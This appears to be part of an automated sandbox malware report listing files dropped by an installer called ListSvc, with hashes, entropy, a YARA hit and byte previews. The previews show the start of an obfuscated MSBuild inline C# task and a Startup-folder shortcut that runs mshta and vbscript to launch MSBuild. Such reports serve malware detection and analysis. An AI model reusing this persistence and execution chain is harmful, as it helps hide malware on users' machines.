Preview:	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">..<Target Name="RVsqtTlOUIlLCbKpjAcrwQlHGZRXNxb"><PMBzGdPIjJFpXNdMCswZwsxdbJLKucnb wHwYaCdltSSIRAnUCnoFqyEwpxxWs="$(MSBuildProjectFullPath)" fnhvDTqqeLZolFEzPmAwQhhNHLYcaJDehToELmoHXEyCorfSaWzlXABXgtNRVnpuhUhrraODXSymJFyqGfbdjr="$(MSBuildToolsPath)"/>..</Target>..<UsingTask TaskName="PMBzGdPIjJFpXNdMCswZwsxdbJLKucnb" TaskFactory="CodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll"><ParameterGroup><wHwYaCdltSSIRAnUCnoFqyEwpxxWs ParameterType="System.String" Required="true" /><fnhvDTqqeLZolFEzPmAwQhhNHLYcaJDehToELmoHXEyCorfSaWzlXABXgtNRVnpuhUhrraODXSymJFyqGfbdjr ParameterType="System.String" Required="true" /></ParameterGroup><Task><Code Type="Class" Lang="cs">..<![CDATA[using System;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;using System.Runtime.InteropServices;using System.Runtime.InteropServices.ComTypes;using System.Diagnostics;using System.IO;us

C:\Users\user\AppData\Roaming\Logs\10-13-2021 Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	224
Entropy (8bit):	7.157583158568144
Encrypted:	false
SSDEEP:	6:s6YjWBeKhsbjgU4XRWX3zfIEtZGIx63DQtEtwN7nO5n:s6MQfsbMVWIEHdk30BNK5
MD5:	844ADF031D98AD5527163AECFA474BE0
SHA1:	2D0021731FEDFCB314BFF2A2A75F9E488CE137FB
SHA-256:	DA5BDBCBA113A77CA41D18554B8BB9F309C8B3C24B18777B7056730C0423AF72
SHA-512:	331735C1FCC52FB9E96A32F0A324BF84EBFD6D7731F2E903EB6FF1EB496FF5E4E3C3A461BEC068B65B28EDBA65C83A110CFFBDFEC264460E4B610F51B9B156BE
Malicious:	false
Reputation:	unknown
Preview:	.L.T.W.[.B..l@]_.L.!1=..V.a...Y.}./.{........m/...c....~e#C-.U..\|..}....j:.^)r....?...w)^...&..Qk..~v...#...e/K.s..C9..s.T..i..V..3..d.g..^Q.c.E.K..).$.+P.t.c..H.........-^....P.U....VR.A.q.... s....\...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ListSvc.lnk Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	1052
Entropy (8bit):	3.4818518204317077
Encrypted:	false
SSDEEP:	12:8AlXEBm/3BVSXzzeMD6R2W+feDRqu8alt06fwoW+gxoIajFxBQ14+7QgiNL4t2YS:8AB/B4UP+feAuTU6fwB+gjL2kO57aB
MD5:	71AB30BFE968522BC28A8E524ED6C032
SHA1:	C8FB8162F00AA5952FF045F99015C618936EA5D6
SHA-256:	1B30F6C5B202789AF6314B539061419693CAB9DC11222D05D91F7BFD6B988256
SHA-512:	04A616705CF66AE8DA13C65CF2E01E0EA2F0BFE93E9B739B0995BBF2770B5054B2C9BBE1A9E2D340855E9B9D56BAA48C8205240BD182F69A7BC6DA045D5A1438
Malicious:	false
Yara Hits:	Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ListSvc.lnk, Author: Florian Roth
Reputation:	unknown
Preview:	L..................F........................................................;....P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........system32..B............................................s.y.s.t.e.m.3.2.....\.2...........mshta.exe.D............................................m.s.h.t.a...e.x.e.......5.....\.....\.....\.....\.....\.....\.....\.....\.....\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.m.s.h.t.a...e.x.e...v.b.s.c.r.i.p.t.:.e.x.e.c.u.t.e.(.".c.r.e.a.t.e.o.b.j.e.c.t.(.".".w.s.c.r.i.p.t...s.h.e.l.l.".".)...r.u.n. .".".\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.M.S.B.u.i.l.d. .".".".".%.u.s.e.r.p.r.o.f.i.l.e.%.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.L.i.s.t.S.v.c...u.r.l.".".".".".".,.0.:.c.l.o.s.e.(.).".).........%...............wN....]N.D...Q..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.

C:\Users\user\AppData\Roaming\SbsNclPerf.dll (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23600
Entropy (8bit):	6.993037210115726
Encrypted:	false
SSDEEP:	384:nj+Pkt62WWIJlWKTjF0GftpBjjO1IPBc4HRN7DdjXlPHBlQ:n7t09+ig1IBBD1y
MD5:	B334E16E8196A9F8B1358AC7007CE702
SHA1:	919A913257773110B7AEEEFABD419BF974A6D818
SHA-256:	E859F2245D7CB5500F4239A2C95E23C81F92F44847E8723F328CDCF9C68439ED
SHA-512:	154F64BBDB3452C2EA569FC7EE395DC3AE365B05D33E7D519B85375B7760917041A8443AC1546E1729A78CDE0E7CE0681E6A95EA865CCD0928CFF0D509593997
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........'.m.t.m.t.m.t...t.m.tO..t.m.t.m.t.m.tO..t.m.tO..t.m.tO..t.m.t.?.t.m.t.?.t.m.t.?.t.m.t.?.t.m.tRich.m.t........PE..L.....}O...........!......................... ...............................P............@.............................5...t...<....0.. ...............0>...@..........................................@............................................text............................... ..`.data...\.... ......................@....rsrc... ....0......................@..@.reloc..X....@......................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ServiceModelEvents.dll (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18480
Entropy (8bit):	7.127308216837376
Encrypted:	false
SSDEEP:	384:cW2NdWqHJO0GftpBjBZDkc4HRN7TKllYD+IS/:ERpNivWBWAqIe
MD5:	15E2F1F5D81F5C78185D52779AFED421
SHA1:	0C9765C28D2A094B879D70744ADEA51BB1261AB6
SHA-256:	AE4C29468A029D1502A2410B1C9C629E7F4F1A87211F48301D79A00DD10772EF
SHA-512:	2E45A76EA023CBFC6F6AAB9B1420A6BA8654934509543A1DAAD8457032B65FD98D3ED5158979EEB5E5E94CDDEEAA00F6AABA4112ADC1934AE84DDFF10CE4980E
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.<.1.R.1.R.1.R....0.R...P.0.R.Rich1.R.........PE..L...wv.\.........."!.........................................................0.......&....@.......................................... ..................0>...........................................................................................text...p...........................@..@.rsrc........ ......................@..@............wv.\........T........................rdata......T....rdata$zzzdbg.... .. ....rsrc$01.... !..Pf...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ServiceModelInstallRC.dll (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18688
Entropy (8bit):	7.126790019256378
Encrypted:	false
SSDEEP:	384:0fWVGsaWsCeF0GftpBjOuc4HRN76u5j0l9Da:0Nss+ijB/
MD5:	1C236BD4C76E671F59BB3F3EDFDA8572
SHA1:	C8615CFA4D36361978B6F53113EB55FB0979B33E
SHA-256:	E05FFF67D7736F64A9B52F4E9D3A18106F46378736B952254A97BFDF371D8B42
SHA-512:	47FFB3B8391EFF760EFE41E21606F301C62E32E1F325B2E833DEE5B96C506AB1087FE40D647B4375127BCC30040089688FF9199D320E5503D78E810D462FCCEC
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.<.1.R.1.R.1.R....0.R...P.0.R.Rich1.R.........PE..L....v.\.........."!.........................................................0............@.......................................... ...................?...........................................................................................text...p...........................@..@.rsrc........ ......................@..@.............v.\........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ..0....rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ServiceModelPerformanceCounters.dll (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	90160
Entropy (8bit):	6.520809936314566
Encrypted:	false
SSDEEP:	1536:DCYcjsWY5cdKXz6ZNJbSOaWvk0fqG73yfrcqOGO7AqEsysdW4kV+dB:Dnc2oK4D+WMrG7ieAqEsyMW9A
MD5:	0BBCCDDFF5124ED2C62F92BBEE5B7DC6
SHA1:	49F38B48A737810E36B36FA5E0EC88327F90BD38
SHA-256:	EC6332F693E8A14A6E87A99EB16434CF8014B42FD5713D2FBF96F8067DBD8C86
SHA-512:	000C0EB88BA1380365F6ACA187EC4DB5A87AAE07A93930FEC9D769A936228F6F11E81C0DBDAFA59FFB833B0BCBFBD9B124955C003B4CAE142886FFCE115BD28F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.PMo.>.o.>.o.>.o.?.8.>....j.>..0..f.>..0....>..0..w.>...=.~.>...;.y.>...:.`.>...7.n.>.....n.>...<.n.>.Richo.>.........PE..L...uv.\.........."!................0`.......................................P............@A.................................!..(....0..............."..0>...@.......Y..T............................Y..@............ ...............................text............................... ..`.data...$...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ServiceModelPerformanceCounters.man (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	129042
Entropy (8bit):	3.444291221512488
Encrypted:	false
SSDEEP:	384:J+iLHCxBcrLbOpSVbghS8oPYT4X5PoyxgH3sjPsLZdzdlW4VehkXfSVINIfnkPoo:dLVb+S8fdzdlW4YZjdDWv3grb4C5EZL
MD5:	5C05ACF6269692AF0B1AE694DC2E554D
SHA1:	806F438BF081E0C8B7C9BAF2647FA9D93378FB82
SHA-256:	755C2B16EFB8E458B99DC57EE3EF9C320A25C320F99F3CFCF185EA8CDB800F33
SHA-512:	E3565F22FC7F16693A927E9C7906EBAA7907C509A36D35AADD30EBC07861AF3F76482000AF459C941C8E86901031F051F36F84719A82C34FBAB4864987080498
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.M.a.n.i.f.e.s.t. .x.s.i.:.s.c.h.e.m.a.L.o.c.a.t.i.o.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s. .e.v.e.n.t.m.a.n...x.s.d.". .x.m.l.n.s.:.w.i.n.=.".h.t.t.p.:././.m.a.n.i.f.e.s.t.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.w.i.n.d.o.w.s./.e.v.e.n.t.s.". .x.m.l.n.s.:.x.s.i.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.-.i.n.s.t.a.n.c.e.". .x.m.l.n.s.:.x.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.". .x.m.l.n.s.:.t.r.a.c.e.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.t.r.a.c.e.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s.".>..... . .<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.>..... . . . .<.e.v.e.n.t.s.>..... . . . .<./.e.v.e.n.t.s.>..... . . . .<.c.o.

C:\Users\user\AppData\Roaming\WMINet_Utils.dll (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	139312
Entropy (8bit):	5.737138359906591
Encrypted:	false
SSDEEP:	1536:4LjjjvCH9zzZa7eWjhMrFIwRNxFXEMx6m/dVLW17BvLxsBG:4Hfv4YqFNr0nm/dVL67RxV
MD5:	A6D94E482863A3CB8C1C9430855F1DE3
SHA1:	6D2222C9ED4C2E6043F7B2DC03576B8DB0B8C35F
SHA-256:	DB900D4C4B24C884E96A5887A034235C430CDA70B773E1643CADE98E8CC8B518
SHA-512:	84A1038E1BC2116C1A6567326A3315477FB11FF645739914A09B7DF44C0538EB1B738D9919C6A2265061BEB3F00DE5CCC04302666024A84B3A454B0757CCD0DE
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B!.t,r.t,r.t,rk./s.t,rS..r.t,rS..r.t,r<.-s.t,r<./s.t,r<.)s.t,r<.(s.t,r.t-r.t,rS..r.t,rk.)s.t,rk.,s.t,rk..r.t,rk..s.t,rRich.t,r................PE..L....o.\.........."!.........D.......................................................l....@A........................p.......D...........h...............0>......4....W..T...........................(X..@...............@............................text...%........................... ..`.data...............................@....idata..............................@..@.rsrc...h...........................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Workflow.Targets (copy) Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	exported SGML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	7128
Entropy (8bit):	5.128932478859387
Encrypted:	false
SSDEEP:	192:sFuFu1AO1jBAmHU+U3IqqAJyJ8d9A0PF9jaQ:sMjmHU+UvJyJeF9jR
MD5:	81703FB68ED8FB64EC54595BE71E2699
SHA1:	A3AC429F55F52A9AEFAAAE96FD674D02DBF4F3AD
SHA-256:	F755ACA19403707BEF4DCDF4CFEFEF2306897C9E98E1B2D87CF8045583658CE2
SHA-512:	39F7D3B1565367AA0AA528D7F1C5446AC711DD4142E3C1D5D87F337B174042389C7002FF83CA792D61865A606F5ACC829CEE553D025D6FF85466EEB1E879B7FF
Malicious:	false
Reputation:	unknown
Preview:	.<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">...<UsingTask TaskName="System.Workflow.ComponentModel.Compiler.CompileWorkflowTask" AssemblyName="System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />...<UsingTask TaskName="System.Workflow.ComponentModel.Compiler.CreateWorkflowManifestResourceNameForCSharp" AssemblyName="System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />...<PropertyGroup>....<WinWFTempFiles>....</WinWFTempFiles>....<KeepWinWFTempFiles>....</KeepWinWFTempFiles>...</PropertyGroup>...<PropertyGroup>....<CoreCompileDependsOn>$(CoreCompileDependsOn);WorkflowCompilation</CoreCompileDependsOn>....<CoreBuildDependsOn>$(CoreBuildDependsOn);WorkflowCompilationCleanup</CoreBuildDependsOn>...</PropertyGroup>... Note: The inputs and outputs of the "WorkflowCompilation" target match those of .. "Compile" target in CSharp.Targets/VisualBasic.Targe

C:\Users\user\AppData\Roaming\is-0A4N9.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18480
Entropy (8bit):	7.127308216837376
Encrypted:	false
SSDEEP:	384:cW2NdWqHJO0GftpBjBZDkc4HRN7TKllYD+IS/:ERpNivWBWAqIe
MD5:	15E2F1F5D81F5C78185D52779AFED421
SHA1:	0C9765C28D2A094B879D70744ADEA51BB1261AB6
SHA-256:	AE4C29468A029D1502A2410B1C9C629E7F4F1A87211F48301D79A00DD10772EF
SHA-512:	2E45A76EA023CBFC6F6AAB9B1420A6BA8654934509543A1DAAD8457032B65FD98D3ED5158979EEB5E5E94CDDEEAA00F6AABA4112ADC1934AE84DDFF10CE4980E
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.<.1.R.1.R.1.R....0.R...P.0.R.Rich1.R.........PE..L...wv.\.........."!.........................................................0.......&....@.......................................... ..................0>...........................................................................................text...p...........................@..@.rsrc........ ......................@..@............wv.\........T........................rdata......T....rdata$zzzdbg.... .. ....rsrc$01.... !..Pf...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\is-5BN3G.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19328
Entropy (8bit):	6.44891297813936
Encrypted:	false
SSDEEP:	384:axu1O5OhXyeJE//9z9R3jxWPW2WqdHRN7ztjwuAzXulGswMx+Ty:Dhte3NTXQzUzrRTy
MD5:	175A0041323081BC33FE446C863AC2B1
SHA1:	CE4633101D44891507292681C30F06770C5C1057
SHA-256:	15B8B74FDC26321E64FFC48720A9607B1A4880ABDC87189E73FC1BF21A40BF65
SHA-512:	70691014E290526C5D6744555B6191A1BAAD2D9D7E403B02F0031C439E7589B916400F709E517C4ADF738E850185154F6A0B5334EA357E57BA60113A79F524BF
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................................................v.....G.....G.....G.0.....G.....Rich............PE..L...G.._...........!.........................0...............................p............@A.........................#..T...\|@..P....P..`............(...#...`..P...p...T...............................@............@..x............................text............................... ..`.data........0......................@....idata.......@......................@..@.rsrc...`....P....... ..............@..@.reloc..P....`.......&..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\is-D9R9F.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	102568
Entropy (8bit):	6.274915370413725
Encrypted:	false
SSDEEP:	1536:f+O0+0BABvzenRuFTKLNkG1xkQJVkMTUuhkHyC+dBsE:f+T+JzeRuFTIkakMTUuhdTn
MD5:	4DF5F963C7E18F062E49870D0AFF8F6F
SHA1:	0A033024346BF706CAD68E90A14C0D651B123EC2
SHA-256:	CFA7D98AD44C7FB11DE5FF07DA04F8FD4A3423564DE05F87BA5E10BD13A1FE59
SHA-512:	67086DA7E21E60E0DDF66CEE090AD1ACCC8D9D7F627942ECFE1BD8E9E47E98FE9A50B9F077FBA7584A002B7BE5D6DE18B4DD84268B441509DB18D822ABF9D81B
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D...D...D.....n.E.......@.......F.......Q.......J...Z.A.F...D.........k.M.......Y.....-.E.......E...RichD...................PE..L...qn.\.........."..........6...............0....@..................................E....@...... ...........................Q.......`...............R...>...p..........T...............................@............P...............................text...D........................... ..`.data........0......................@....idata..6....P......................@..@.rsrc........`.......,..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\is-EQBV6.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	564616
Entropy (8bit):	6.436029660287372
Encrypted:	false
SSDEEP:	6144:UAtPl0D3DxEx3J7Ug0nbfSvvE9P3htxISqw+89+e0SIGjBfr8UozXuRojQF:GPxEx3wO3GBISLjZjtoU
MD5:	BDB097F9A5E9025E97E4F3D0F0BB07EE
SHA1:	DCB972808A74251B2836E23D5F026C6DC6AC14C0
SHA-256:	6499A3B377CCE1AFAD924F15291F8913C5E30177392A0DFB605178FAD9954040
SHA-512:	3BF7A7101288632B9BB0ED4106A7E16BAB030759DEB889B8DD35C83A0E2FAC2D241FC6247179796A848F99CA841B33570CA2EF0930D5986E63CA2F6007E5C53B
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......b..!&.r&.r&.r...s".r...s..r...s!.r.s%.r.?r'.r.:r$.r...s4.r.8r,.r.=r-.r&.r..r.sG.r.s'.r.{r'.r.s'.rRich&.r........................PE..L...L.._...........!.....\...*......L........ ......................................Z.....@A.............................\|........... ..h;...........z...#...`..$b...j..T...............................@....................X.......................text....[.......\.................. ..`.data...hh...p...Z...`..............@....idata..V...........................@..@.didat..............................@....tls................................@....rsrc...h;... ...<..................@..@.reloc..$b...`...d..................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Roaming\is-H2SC5.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18688
Entropy (8bit):	7.126790019256378
Encrypted:	false
SSDEEP:	384:0fWVGsaWsCeF0GftpBjOuc4HRN76u5j0l9Da:0Nss+ijB/
MD5:	1C236BD4C76E671F59BB3F3EDFDA8572
SHA1:	C8615CFA4D36361978B6F53113EB55FB0979B33E
SHA-256:	E05FFF67D7736F64A9B52F4E9D3A18106F46378736B952254A97BFDF371D8B42
SHA-512:	47FFB3B8391EFF760EFE41E21606F301C62E32E1F325B2E833DEE5B96C506AB1087FE40D647B4375127BCC30040089688FF9199D320E5503D78E810D462FCCEC
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u.<.1.R.1.R.1.R....0.R...P.0.R.Rich1.R.........PE..L....v.\.........."!.........................................................0............@.......................................... ...................?...........................................................................................text...p...........................@..@.rsrc........ ......................@..@.............v.\........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ..0....rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\is-ITNUJ.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	139312
Entropy (8bit):	5.737138359906591
Encrypted:	false
SSDEEP:	1536:4LjjjvCH9zzZa7eWjhMrFIwRNxFXEMx6m/dVLW17BvLxsBG:4Hfv4YqFNr0nm/dVL67RxV
MD5:	A6D94E482863A3CB8C1C9430855F1DE3
SHA1:	6D2222C9ED4C2E6043F7B2DC03576B8DB0B8C35F
SHA-256:	DB900D4C4B24C884E96A5887A034235C430CDA70B773E1643CADE98E8CC8B518
SHA-512:	84A1038E1BC2116C1A6567326A3315477FB11FF645739914A09B7DF44C0538EB1B738D9919C6A2265061BEB3F00DE5CCC04302666024A84B3A454B0757CCD0DE
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B!.t,r.t,r.t,rk./s.t,rS..r.t,rS..r.t,r<.-s.t,r<./s.t,r<.)s.t,r<.(s.t,r.t-r.t,rS..r.t,rk.)s.t,rk.,s.t,rk..r.t,rk..s.t,rRich.t,r................PE..L....o.\.........."!.........D.......................................................l....@A........................p.......D...........h...............0>......4....W..T...........................(X..@...............@............................text...%........................... ..`.data...............................@....idata..............................@..@.rsrc...h...........................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\is-LDHE5.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	129042
Entropy (8bit):	3.444291221512488
Encrypted:	false
SSDEEP:	384:J+iLHCxBcrLbOpSVbghS8oPYT4X5PoyxgH3sjPsLZdzdlW4VehkXfSVINIfnkPoo:dLVb+S8fdzdlW4YZjdDWv3grb4C5EZL
MD5:	5C05ACF6269692AF0B1AE694DC2E554D
SHA1:	806F438BF081E0C8B7C9BAF2647FA9D93378FB82
SHA-256:	755C2B16EFB8E458B99DC57EE3EF9C320A25C320F99F3CFCF185EA8CDB800F33
SHA-512:	E3565F22FC7F16693A927E9C7906EBAA7907C509A36D35AADD30EBC07861AF3F76482000AF459C941C8E86901031F051F36F84719A82C34FBAB4864987080498
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.M.a.n.i.f.e.s.t. .x.s.i.:.s.c.h.e.m.a.L.o.c.a.t.i.o.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s. .e.v.e.n.t.m.a.n...x.s.d.". .x.m.l.n.s.:.w.i.n.=.".h.t.t.p.:././.m.a.n.i.f.e.s.t.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.w.i.n.d.o.w.s./.e.v.e.n.t.s.". .x.m.l.n.s.:.x.s.i.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.-.i.n.s.t.a.n.c.e.". .x.m.l.n.s.:.x.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.". .x.m.l.n.s.:.t.r.a.c.e.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.t.r.a.c.e.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s.".>..... . .<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.>..... . . . .<.e.v.e.n.t.s.>..... . . . .<./.e.v.e.n.t.s.>..... . . . .<.c.o.

C:\Users\user\AppData\Roaming\is-MH0EU.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	exported SGML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	7128
Entropy (8bit):	5.128932478859387
Encrypted:	false
SSDEEP:	192:sFuFu1AO1jBAmHU+U3IqqAJyJ8d9A0PF9jaQ:sMjmHU+UvJyJeF9jR
MD5:	81703FB68ED8FB64EC54595BE71E2699
SHA1:	A3AC429F55F52A9AEFAAAE96FD674D02DBF4F3AD
SHA-256:	F755ACA19403707BEF4DCDF4CFEFEF2306897C9E98E1B2D87CF8045583658CE2
SHA-512:	39F7D3B1565367AA0AA528D7F1C5446AC711DD4142E3C1D5D87F337B174042389C7002FF83CA792D61865A606F5ACC829CEE553D025D6FF85466EEB1E879B7FF
Malicious:	false
Reputation:	unknown
Preview:	.<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">...<UsingTask TaskName="System.Workflow.ComponentModel.Compiler.CompileWorkflowTask" AssemblyName="System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />...<UsingTask TaskName="System.Workflow.ComponentModel.Compiler.CreateWorkflowManifestResourceNameForCSharp" AssemblyName="System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />...<PropertyGroup>....<WinWFTempFiles>....</WinWFTempFiles>....<KeepWinWFTempFiles>....</KeepWinWFTempFiles>...</PropertyGroup>...<PropertyGroup>....<CoreCompileDependsOn>$(CoreCompileDependsOn);WorkflowCompilation</CoreCompileDependsOn>....<CoreBuildDependsOn>$(CoreBuildDependsOn);WorkflowCompilationCleanup</CoreBuildDependsOn>...</PropertyGroup>... Note: The inputs and outputs of the "WorkflowCompilation" target match those of .. "Compile" target in CSharp.Targets/VisualBasic.Targe

C:\Users\user\AppData\Roaming\is-SF1RP.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	90160
Entropy (8bit):	6.520809936314566
Encrypted:	false
